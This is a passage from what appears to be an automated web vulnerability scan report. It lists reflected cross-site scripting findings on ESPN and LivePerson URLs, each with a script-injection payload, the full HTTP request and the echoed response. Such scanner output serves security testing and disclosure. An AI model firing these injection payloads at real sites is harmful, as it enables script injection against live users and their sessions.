Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Sat, 26 Feb 2011 02:22:52 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 26 Feb 2011 02:22:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 26 Feb 2011 02:23:52 GMT
Content-Length: 21817
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Game Recap - ESPN C
...[SNIP]...
<a href="http://sports.espn.go.com/ncbbf0f9"><script>alert(1)</script>e1494246220/boxscore?gameId=310542507">
...[SNIP]...

3.344. http://sports.espn.go.com/espn/js/uniloginInLineReplace [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /espn/js/uniloginInLineReplace

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload d4bef<script>alert(1)</script>37fa09da2a3 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /espn/js/uniloginInLineReplace?cb=runOmnitureIndependentlyd4bef<script>alert(1)</script>37fa09da2a3 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:08:02 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:08:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Wed, 23 Feb 2011 23:18:02 GMT
Content-Length: 324
Connection: close
X-UA-Compatible: IE=EmulateIE7


if(""==""){
   runOmnitureIndependentlyd4bef<script>alert(1)</script>37fa09da2a3(null, null, null, null, null, null, null);
}
else{
   var insiderTokenCheck = "0";
   if(insiderTokenCheck == "0") insiderTokenCheck = "0";
   runOmnitureIndependentlyd4bef<script>
...[SNIP]...

3.345. http://sports.espn.go.com/golf/columns/story [columnist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /golf/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload 79c9f--><script>alert(1)</script>32e5dd3314b was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /golf/columns/story?columnist=sobel_jason79c9f--><script>alert(1)</script>32e5dd3314b&page=CiL HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=15
Date: Wed, 23 Feb 2011 23:07:54 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN05
Cache-Expires: Wed, 23 Feb 2011 23:10:09 GMT
Content-Length: 41287
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<!--/golf/columns/story?columnist=sobel_jason79c9f--><script>alert(1)</script>32e5dd3314b&page=CiL-->
...[SNIP]...

3.346. http://sports.espn.go.com/mlb/columns/story [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /mlb/columns/story

Issue detail

The value of the id request parameter is copied into an HTML comment. The payload a24de--><script>alert(1)</script>8a656193ce9 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /mlb/columns/story?columnist=crasnick_jerry&id=6095672\a24de--><script>alert(1)</script>8a656193ce9 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=15
Date: Sat, 26 Feb 2011 02:21:47 GMT
Content-Type: text/html
Last-Modified: Sat, 26 Feb 2011 02:21:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 26 Feb 2011 02:22:47 GMT
Content-Length: 59814
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<!--/mlb/columns/story?columnist=crasnick_jerry&id=6095672\a24de--><script>alert(1)</script>8a656193ce9-->
...[SNIP]...

3.347. http://sports.espn.go.com/ncaa/columns/story [columnist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /ncaa/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload f2e24--><script>alert(1)</script>7793b931b30 was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ncaa/columns/story?columnist=forde_patf2e24--><script>alert(1)</script>7793b931b30&id=6150934 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:07:40 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Wed, 23 Feb 2011 23:14:00 GMT
Content-Length: 50181
Cache-Control: no-cache
Pragma: no-cache
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<!--/ncaa/columns/story?columnist=forde_patf2e24--><script>alert(1)</script>7793b931b30&id=6150934-->
...[SNIP]...

3.348. http://sports.espn.go.com/ncaa/columns/story [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /ncaa/columns/story

Issue detail

The value of the id request parameter is copied into an HTML comment. The payload e22e0--><script>alert(1)</script>51559d0ec4 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ncaa/columns/story?columnist=forde_pat&id=6150934e22e0--><script>alert(1)</script>51559d0ec4 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:07:42 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Wed, 23 Feb 2011 23:14:02 GMT
Content-Length: 48840
Cache-Control: no-cache
Pragma: no-cache
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<!--/ncaa/columns/story?columnist=forde_pat&id=6150934e22e0--><script>alert(1)</script>51559d0ec4-->
...[SNIP]...

3.349. http://sports.espn.go.com/new-york/mlb/columns/story [columnist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /new-york/mlb/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload ab783--><script>alert(1)</script>13cf7f13f38 was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new-york/mlb/columns/story?columnist=marchand_andrewab783--><script>alert(1)</script>13cf7f13f38&id=6148017 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:07:25 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN35
Cache-Expires: Wed, 23 Feb 2011 23:08:25 GMT
Content-Length: 48771
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Spring Training 201
...[SNIP]...
<!--url:/newyork/mlb/columns/story?columnist=marchand_andrewab783--><script>alert(1)</script>13cf7f13f38&id=6148017-->
...[SNIP]...

3.350. http://sports.espn.go.com/new-york/nba/columns/story [columnist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /new-york/nba/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload a78ab--><script>alert(1)</script>30f7ceccaa0 was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new-york/nba/columns/story?columnist=smith_stephena78ab--><script>alert(1)</script>30f7ceccaa0&id=6151461 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:07:02 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Wed, 23 Feb 2011 23:08:02 GMT
Content-Length: 49403
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The New Jersey Nets
...[SNIP]...
<!--url:/newyork/nba/columns/story?columnist=smith_stephena78ab--><script>alert(1)</script>30f7ceccaa0&id=6151461-->
...[SNIP]...

3.351. http://sports.espn.go.com/new-york/ncb/columns/story [columnist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /new-york/ncb/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload 96982--><script>alert(1)</script>2e8bd08d9cb was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new-york/ncb/columns/story?columnist=darcy_kieran96982--><script>alert(1)</script>2e8bd08d9cb&id=6149055 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:07:07 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN06
Cache-Expires: Wed, 23 Feb 2011 23:08:07 GMT
Content-Length: 45822
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>St. John's is back
...[SNIP]...
<!--url:/newyork/ncb/columns/story?columnist=darcy_kieran96982--><script>alert(1)</script>2e8bd08d9cb&id=6149055-->
...[SNIP]...

3.352. http://sports.espn.go.com/new-york/nfl/columns/story [columnist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /new-york/nfl/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload 7fb3d--><script>alert(1)</script>49cb1de33c was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new-york/nfl/columns/story?columnist=cimini_rich7fb3d--><script>alert(1)</script>49cb1de33c&id=6124996 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:07:29 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN15
Cache-Expires: Wed, 23 Feb 2011 23:08:29 GMT
Content-Length: 41612
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New York Jets decis
...[SNIP]...
<!--url:/newyork/nfl/columns/story?columnist=cimini_rich7fb3d--><script>alert(1)</script>49cb1de33c&id=6124996-->
...[SNIP]...

3.353. http://sports.espn.go.com/new-york/teams/recap [sport parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /new-york/teams/recap

Issue detail

The value of the sport request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0be4"><script>alert(1)</script>bd9314bed95 was submitted in the sport parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york/teams/recap?gameId=310530164&sport=ncbc0be4"><script>alert(1)</script>bd9314bed95 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:07:36 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN09
Cache-Expires: Wed, 23 Feb 2011 23:08:36 GMT
Content-Length: 20995
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Game Recap - ESPN N
...[SNIP]...
<a href="http://sports.espn.go.com/ncbc0be4"><script>alert(1)</script>bd9314bed95/boxscore?gameId=310530164">
...[SNIP]...

3.354. http://sr2.liveperson.net/visitor/addons/deploy.asp [site parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://sr2.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 875bb%0a4f95fc6c67c was submitted in the site parameter. This input was echoed as 875bb
4f95fc6c67c
in the application's response.

